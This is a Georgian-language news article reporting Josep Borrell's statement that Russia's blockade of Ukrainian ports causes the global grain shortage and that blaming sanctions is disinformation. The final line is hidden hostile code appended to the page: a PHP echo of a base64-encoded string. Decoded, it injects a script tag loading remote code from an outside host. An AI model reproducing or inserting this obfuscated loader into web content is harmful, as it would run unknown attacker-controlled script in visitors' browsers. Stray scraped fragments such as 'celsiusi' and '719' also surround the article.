celsiusi
ავერსი შნაიდერი
რუსეთი პირდაპირ არის პასუხისმგებელი მსოფლიოში მარცვლეულის დეფიციტზე, რადგან ბლოკირებული აქვს უკრაინის პორტები, – ამის შესახებ საგარეო პოლიტიკისა და უსაფრთხოების საკითხებში ევროკავშირის უმაღლესმა წარმომადგენელმა, ჯოზეფ ბორელმა სოციალურ ქსელ „ტვიტერში“ დაწერა.
 
ევროპელი დიპლომატი დეზინფორმაციას უწოდებს რუსეთის განცხადებებს, რომ გლობალურ სასურსათო კრიზისს დასავლეთის მიერ დაწესებული სანქციები იწვევს. ბორელის თქმით, ევროკავშირის მიერ დაწესებული სანქციები არ ეხება სოფლის მეურნეობის პროდუქციას და მის ტრანსპორტირებას.
 
„აგრესიის ომები დაუშვებელია. ევროკავშირის სანქციები მიმართულია რუსეთის შესაძლებლობის წინააღმდეგ, აწარმოოს ომი. ისინი არ არის მიმართული ხორბლის წინააღმდეგ. სოფლის მეურნეობის პროდუქცია და მათი ტრანსპორტირება ცალსახად გამონაკლისია. რუსეთის მიერ უკრაინის პორტების მიმდინარე ბლოკადა შეუძლებელს ხდის მსოფლიოს ერთ-ერთ მთავარ მწარმოებელ ქვეყანაში, უკრაინაში ჩარჩენილი ტონობით მარცვლეულის ექსპორტს, მათ შორის სიმინდისა და ხორბლის. რუსეთი პირდაპირ არის პასუხისმგებელი საერთაშორისო ვაჭრობაში მარცვლეულის ნებისმიერ დეფიციტზე და თავისი აგრესიის დასრულების სანაცვლოდ, აქტიურად ცდილობს, პასუხისმგებლობა საერთაშორისო სანქციებზე გადაიტანოს. ეს არის დეზინფორმაცია“, – წერს ჯოზეფ ბორელი.
 
როგორც ბორელი აღნიშნავს, ევროკავშირი გააგრძელებს სოლიდარობის დემონსტრირებას მსოფლიოს ქვეყნებთან ერთად ომის შედეგებთან გასამკლავებლად.
 
„პრეზიდენტმა პუტინმა უნდა დაასრულოს ეს ომი უკრაინის წინააღმდეგ. უკრაინის ტერიტორიული მთლიანობა უნდა აღდგეს. ეს მთელი საერთაშორისო საზოგადოების ინტერესებში შედის. ჩვენ უკრაინის გვერდით ვდგავართ“, – განაცხადა ბორელმა.
719
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");